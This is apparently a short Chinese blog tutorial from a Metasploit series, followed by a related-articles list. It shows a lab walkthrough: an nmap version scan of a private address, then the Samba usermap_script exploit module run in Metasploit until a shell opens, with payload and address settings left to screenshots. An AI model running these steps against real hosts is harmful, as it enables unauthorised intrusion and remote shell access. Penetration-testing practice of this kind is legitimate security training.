Metasploit系列(二) -- 漏洞利用

简介: Metasploit系列(二) -- 漏洞利用


一、使用nmap扫描目标机开放的端口


nmap -sV 192.168.10.254

0a2653c851af460fa595bd959398a8f1.png


二、主机运行着Samba 3.x服务,search samba


0eacb84100b54626af849e6b562bf92a.png


三、use exploit/multi/samba/usermap_script


四、选择攻击载荷模块


2d65d23f6d4748949b924e4057485923.png


五、设置被攻击主机ip及端口,发动攻击ip及端口


2e9b90b2ca334476abebe75bafe6eeaa.png


六、run


4cebaac233b3433da32a72337a77fc60.png


已建立shell链接

禁止非法,后果自负


目录
相关文章
|
2月前
|
安全 Shell
Metasploit系列(二) -- 漏洞利用
Metasploit系列(二) -- 漏洞利用
38 0
|
2月前
|
安全 Unix 网络安全
Metasploit
Metasploit
51 10
|
2月前
|
安全 Shell Windows
Metasploit -- CVE-2019-0708漏洞检测及利用
Metasploit -- CVE-2019-0708漏洞检测及利用
30 0
|
10月前
|
安全 测试技术 网络安全
如何使用Metasploit进行漏洞利用?
如何使用Metasploit进行漏洞利用?
135 0
|
安全 Shell 数据安全/隐私保护
CVE-2019-15107 Webmin RCE漏洞复现
环境搭建: 进入镜像目录
271 0
|
安全 Ubuntu 关系型数据库
Metasploit -- 攻击Metasploitable2靶机
Metasploit -- 攻击Metasploitable2靶机
412 0
Metasploit -- 攻击Metasploitable2靶机
|
监控 安全 Windows
Metasploit -- 木马生成原理和方法
Metasploit -- 木马生成原理和方法
580 0
Metasploit -- 木马生成原理和方法
|
安全 网络安全 Windows
渗透测试-使用metasploit的evasion模块生成后门木马
渗透测试-使用metasploit的evasion模块生成后门木马
渗透测试-使用metasploit的evasion模块生成后门木马
|
安全 关系型数据库 MySQL
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
|
安全 网络协议 Linux
基于Metasploit完成Samba服务漏洞复现
基于Metasploit完成Samba服务漏洞复现
基于Metasploit完成Samba服务漏洞复现